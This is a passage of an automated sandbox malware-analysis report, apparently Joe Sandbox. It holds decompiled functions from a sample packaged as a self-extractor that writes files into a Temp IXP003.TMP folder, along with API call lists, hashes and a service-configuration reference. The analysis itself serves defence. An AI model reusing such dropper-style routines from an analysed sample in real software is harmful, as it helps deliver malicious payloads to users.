                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6411A53160128A9FDB10FF68DD48ABE77B8EF49310F108164F516D6290DA30AE01DBB5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xde8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xde8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xde8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00DE7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00DE7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00DE719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00DE71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00DE71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: f57fd667806ca6f3766f87ea2b5ea99c84fb3978930e78f0110c85659ffe656d
                                                                                                                                                                                                        • Instruction ID: e2744e99d347a0702358c494093b8119e1418c03141d56d68607a7e38576cdf1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f57fd667806ca6f3766f87ea2b5ea99c84fb3978930e78f0110c85659ffe656d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63114C71D05389DFCB10EFB8DA88A9EB7F4EF58311FA54855E805EB310EA309E049B61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00DE63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E00DE1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        				E00DE658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0xde9124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0xde9124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE63EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-2493987848
                                                                                                                                                                                                        • Opcode ID: 35d402c93dcad0e4dc1ee86b9e0c6b33117e227c4db427ec72db1196dec08bf2
                                                                                                                                                                                                        • Instruction ID: fc77d3da85d66b4071f0c2488ef0c1f8808795b3eb1aa14ac30acd2577b146c2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35d402c93dcad0e4dc1ee86b9e0c6b33117e227c4db427ec72db1196dec08bf2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121C071A00259ABDB10EF26DCC5FEA7768EB54354F1041A9F585A7280DAB0AD848FB4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00DE1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xde91e0; // 0x818e88
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xde91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xde8584; // 0x0
                                                                                                                                                                                                        					E00DE44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xde8584; // 0x0
                                                                                                                                                                                                        				E00DE44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00DE4E6F), ref: 00DE47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00DE4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00DE4847
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-2493987848
                                                                                                                                                                                                        • Opcode ID: c1303d133147995a13791d59eaca0ad3c384d614385501a51af47bc2f140104c
                                                                                                                                                                                                        • Instruction ID: 546a32c5669a5af6136a37afa8ddba6e29372ced61bc171ce766570d0cc589b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1303d133147995a13791d59eaca0ad3c384d614385501a51af47bc2f140104c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F01102B92047C26FE714BF259C98F763B5AEB85300F08851DEA86CB381DA359C068670
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00DE369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00DE36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 2f3808ff6ffe1de1d9faf06c2cb80fa1a4888f088115049dc56af98be497ba61
                                                                                                                                                                                                        • Instruction ID: 97c493b8f82b30ae5434fed6ce1b6e71f225d5f25b883a33cadb1fb3b164dff4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3808ff6ffe1de1d9faf06c2cb80fa1a4888f088115049dc56af98be497ba61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0001447690039577DB306AAB5C4CEFB7B7CEB85B10F14011DB915E7280D561D644C671
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00DE6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xde9a3c; // 0xde0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E00DE44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00DE0000,000007D6,00000005), ref: 00DE652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00DE0000,00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DE6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00DE0000,00000000,00000547,00DE19E0,00000000), ref: 00DE6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DE6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: f640ee5c895556ac150be4c2047d7fbc55e2cb39bc1271e784f3cda04de29543
                                                                                                                                                                                                        • Instruction ID: 70956620bb9615e87b6ee85b9fc1719dd211e383cf85bc176a48624566290c22
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f640ee5c895556ac150be4c2047d7fbc55e2cb39bc1271e784f3cda04de29543
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6012B72200386BBCB107F5A9C48DBB766CEB953A1F050125FE01D7254D771DD1086B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00DE65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00DE2B33), ref: 00DE6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00DE6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00DE6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00DE6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: d4d44e5f4ab286bd7f3978412d62e32403616c4c2754aa869370cc9518f6c03e
                                                                                                                                                                                                        • Instruction ID: 1ef5ee99597cd3d9b9d27b2969772dbd0ff3836e1ad1c50779f6794b781ce4ac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4d44e5f4ab286bd7f3978412d62e32403616c4c2754aa869370cc9518f6c03e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5F0F4320042D16EE7323B2A8CC89BBAF9CDBA7294B2D41EFE495C6101D6158D068671
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE69B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0xde81f8 = E00DE6C70();
                                                                                                                                                                                                        				__set_app_type(E00DE6FBE(2));
                                                                                                                                                                                                        				 *0xde88a4 =  *0xde88a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0xde88a8 =  *0xde88a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0xde8528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0xde851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00DE7000();
                                                                                                                                                                                                        				if( *0xde8000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00DE7000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE71EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00DE6FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00DE69C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00DE69D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00DE69E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00DE6A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: d9fbc232723e3ba1eac306301d09f0a1f8631d2ace0f74bd4acc3afc7e85f392
                                                                                                                                                                                                        • Instruction ID: 44ae93f8b5c45b52a25f403ac952fd1ae39bf1260b18336c6e473fecef3dfe35
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9fbc232723e3ba1eac306301d09f0a1f8631d2ace0f74bd4acc3afc7e85f392
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F0F8705083C28FC794BB35FD8A6083B62FB04321B101A19E565EE3E0CF3A95449A35
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API node in graph: ChangeServiceConfigA]
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
